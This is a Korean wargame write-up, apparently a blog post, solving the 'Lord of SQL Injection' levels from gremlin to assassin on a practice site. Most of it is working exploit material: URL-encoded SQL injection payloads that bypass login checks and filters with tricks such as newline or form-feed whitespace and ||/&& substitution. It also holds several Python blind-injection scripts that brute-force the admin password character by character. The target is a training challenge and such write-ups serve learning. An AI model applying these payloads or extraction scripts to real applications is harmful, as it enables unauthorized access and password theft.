http://leaveret.kr/los/gate.php
rubiya.kr을 다시 재정비해서? 만든 사이트... 앞에서 rubiya.kr의 풀이를 적어놨기에 따로 풀이를 적지는 않음. 비슷하다.
gremlin
?id=admin%27%23
cobolt
?id=admin%27%23
goblin
?no=-1%20union%20select%20char(97,100,109,105,110)%23
orc
# -*- encoding: cp949 -*-
import urllib2
answer = ''
for i in range(1,9):
for j in range(32,128):
print i,j,answer
req = urllib2.Request('http://leaveret.kr:8080/los/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=%27%20or%20id=%27admin%27%20and%20ascii(substr(pw,'+str(i)+',1))='+str(j)+'%23')
req.add_header('cookie','PHPSESSID=k0kefn94gf5skn8ral8gmofkv0')
page = urllib2.urlopen(req).read()
if page.find('<h2>Hello admin</h2>')!=-1:
answer += chr(j)
break
print answerwolfman
?pw=%27%0aor%0aid=%27admin%27%23
darkelf
?pw=%27||id=%27admin%27%23
orge
# -*- encoding: cp949 -*-
import urllib2
answer = ''
for i in range(1,9):
for j in range(32,128):
print i,j,answer
req = urllib2.Request('http://leaveret.kr:8080/los/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27||id=%27admin%27%26%26ascii(substr(pw,'+str(i)+',1))='+str(j)+'%23')
req.add_header('cookie','PHPSESSID=k0kefn94gf5skn8ral8gmofkv0')
page = urllib2.urlopen(req).read()
if page.find('<h2>Hello admin</h2>')!=-1:
answer += chr(j)
break
print answer
troll
?id=Admin
vampire
?id=adadminmin
skeleton
?pw=%27%20or%20id=%27admin%27%23
golem
# -*- encoding: cp949 -*-
import urllib2
answer = ''
for i in range(1,9):
for j in range(32,128):
print i,j,answer
req = urllib2.Request('http://leaveret.kr:8080/los/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=%27||id%20like%20%27admin%27%26%26ascii(right(left(pw,'+str(i)+'),1))%20like%20'+str(j)+'%23')
req.add_header('cookie','PHPSESSID=k0kefn94gf5skn8ral8gmofkv0')
page = urllib2.urlopen(req).read()
if page.find('<h2>Hello admin</h2>')!=-1:
answer += chr(j)
break
print answer
darkknight
# -*- encoding: cp949 -*-
import urllib2
answer = ''
for i in range(1,9):
for j in range(32,128):
print i,j,answer
req = urllib2.Request('http://leaveret.kr:8080/los/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?no=1%20or%20id%20like%20char(97,100,109,105,110)%20and%20ord(right(left(pw,'+str(i)+'),1))%20like%20'+str(j)+'%23')
req.add_header('cookie','PHPSESSID=k0kefn94gf5skn8ral8gmofkv0')
page = urllib2.urlopen(req).read()
if page.find('<h2>Hello admin</h2>')!=-1:
answer += chr(j)
break
print answer
bugbear
# -*- encoding: cp949 -*-
import urllib2
answer = ''
for i in range(1,9):
for j in range(32,128):
print i,j,answer
req = urllib2.Request('http://leaveret.kr:8080/los/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?no=0%0a||%0aid%0aregexp%0achar(97,100,109,105,110)%26%26hex(right(left(pw,'+str(i)+'),1))%0aregexp%0ahex('+str(j)+')%23')
req.add_header('cookie','PHPSESSID=k0kefn94gf5skn8ral8gmofkv0')
page = urllib2.urlopen(req).read()
if page.find('<h2>Hello admin</h2>')!=-1:
answer += chr(j)
break
print answer
giant
?shit=%0c
assassin
이건 좀 설명이 필요한데 like에 관한 문제이다. 근데 '를 쓸수 없으므로 admin의 패스워드를 adf라고 가정하면 %a% 처럼 하면 admin이 출력되게 된다. 근데 32~127로 다 돌려봤어도 hello guest밖에 안나왔다. 이런경우는 딱 하나이다. admin과 guest의 패스워드가 똑같은 문자로 이루어져있지만 배치만 다른 경우이며 guest가 db에서 위쪽에 있는 경우이다. 그러면 admin의 pw가 adf, guest가 dfa라고 하면 %d%라고 검색했을시 guest가 나온다(더 위에 있기 때문에.) 그래도 admin이랑 guest랑 차이점이 뭔가는 있을테니 여러개 매칭을 시도해 보면 된다. admin이 출력되도록 위와같은경우 %adf% 처럼 입력해주면 되는것이다. 아래의 answer초기값은 guest가 나오는 문자열 전부이며 이걸 조합해서 admin이 나올때까지 브루트포싱하는 코드이다.
# -*- encoding: cp949 -*-
import urllib2
answer = '# % & 0 1 2 9 D E F _ d e f'.split()
for k in answer:
for i in answer:
for j in answer:
print k,i,j
req = urllib2.Request('http://leaveret.kr:8080/los/assassin_14a1fd552c61c60f034879e5d4171373.php?pw=%'+k+i+j+'%')
req.add_header('cookie','PHPSESSID=k0kefn94gf5skn8ral8gmofkv0')
page = urllib2.urlopen(req).read()
if page.find('<h2>Hello admin</h2>')!=-1:
print 'end!'
exit(0)
'webhacking > sql, sql injection' 카테고리의 다른 글
| Lord Of SQLinjection iron_golem~evil_wizard (0) | 2015.02.03 |
|---|---|
| Lord Of SQLinjection zombie_assassin~dragon (0) | 2015.02.02 |
| DareYourMind SQL Exploit 1~4 (0) | 2015.01.24 |
| webhacking.kr 27, 29 (0) | 2015.01.15 |
| WeChall No Escape, Training: MySQL I, Training: MySQL II (0) | 2015.01.12 |